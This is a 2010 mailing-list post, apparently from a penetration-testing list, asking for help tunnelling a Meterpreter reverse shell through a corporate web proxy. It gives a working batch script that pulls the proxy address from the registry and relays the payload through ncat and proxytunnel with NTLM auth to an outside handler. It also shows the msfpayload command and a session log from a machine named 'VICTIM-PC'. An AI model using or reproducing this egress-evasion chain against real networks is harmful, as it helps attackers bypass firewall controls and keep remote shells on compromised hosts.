Tunelling Meterpreter connections through HTTP/S Proxy servers

["Sherif Eldeeb" <archeldeeb () gmail com>]

I hit a dead end and help is appreciated."Already asked the metasploit list
but still stuck".
I've been trying the past few days to get a meterpreter reverse_tcp exe to
connect back through an http proxy, and I had no idea that it's going to be
that difficult "for me", my approach was including another tunneling program
that will listen at a local port for meterpreter's connection and handle the
proxy bypassing, a batch file that will automate the process, then packing
the whole thing with IExpress.

Meterpreter connect locally ==> proxy bypassing program ==> PROXY SERVER
====|Internet|===>  exploit/mutli/handler 

And I've been "partially" successful so far and feel like almost there.

Here's the scenario:
-MS ISA 2006 firewall & web proxy.
-Outbound ports allowed : only 80 & 443 through webproxy, 110, 25 and 21
with some kind of protocol filtering.
-Inbound open ports: none, externally exposed Services & servers: none.
-Solution must be valid if a restricted user executed the program.

Long story short, Here's what I found so far:
-for those who didn't try before, Just using LPORT as 80 or 443 doesn't work
because of the web proxy, it even made the meterpreter.exe grow in memory
usage to more than 1.5gb and HDD swapping like crazy, CPU 100%.
-Using port 110 or 25 initially connects, but gets dropped immediately by
the firewall's protocol filter when it detects that the data being sent is
not actually what it should be.
-Reverse_https & reverse_http payloads are not working as discussed earlier.


TUNNELING EXPERIMENTS:
I will not list what didn't work for me, but only "proxytunnel" looked like
the one with promising results, but had two serious drawbacks:

1.You have to define the company's proxy server IP address and port number,
which I do not know, So I used "REG" command to extract the data from
registry.
2.It works with STDIN & STDOUT "not listening on ports AFAIK": I used "ncat
-c" to listen on the local port and redirect the connection to the
proxytunnel.exe

Here's the bat file that did both:
==========CODE==========
@echo off
for /f "tokens=3 delims=^ " %%a IN ('reg query
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyServer ^| find "Proxy"') DO set PRXY = %%a
ncat -k -l 127.0.0.1 4455 -e "proxytunnel.exe -q -N -p %prxy% -d
MyMultiHandlerServer:443"
==========CODE==========

Proxytunnel "-q" quiet "-N" use NTLM auth. "-p" Proxyserver "-d"
multi/handler_server:port

And then make msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1
LPORT=4455, and putting the programs together in one folder, then execute
the payload.exe.
Guess what? It Works! Sort of :(

=========
msf exploit(handler) >
[*] Sending stage (748032 bytes) to 66.55.229.36
[*] Meterpreter session 1 opened (MyMultiHandlerServer:443 ->
66.55.229.36:64206) at
2010-06-20 07:40:47 +0000
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
=========

As you can see, it connects, interacts, then connection dies after a short
while for some reason, the payload.exe, ncat.exe and proxyserver.exe are all
still running,  at the isa monitor it's still indicating that the connection
is established.
same when executing any command like "run winenum" it starts the commands
and records the results, but after 15 to 20 commands, it just dies and times
out.

Away from meterpreter, if I run "ncat -l 443" at the attacking box and "C:\
> proxytunnel.exe -q -N -p proxyserver:8080 -d attacking:443" at the victim's
machine, *connection gets past the Proxy*, bidirectional and NEVER gets
dropped, though it's a useless chat program.

Any help is appreciated, really.        

Thanks in advance,
Sherif.


WHAT DIDN'T WORK:
GNU-HTTPtunnel: HTS didn't port-forward nicely to multi/handler
Stunnel: has a nice looking icon in the notification area :) didn't try
connectivity
Ncat --ssl: for some reason it doesn't accept -e & --ssl together, which
might help.
 







------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------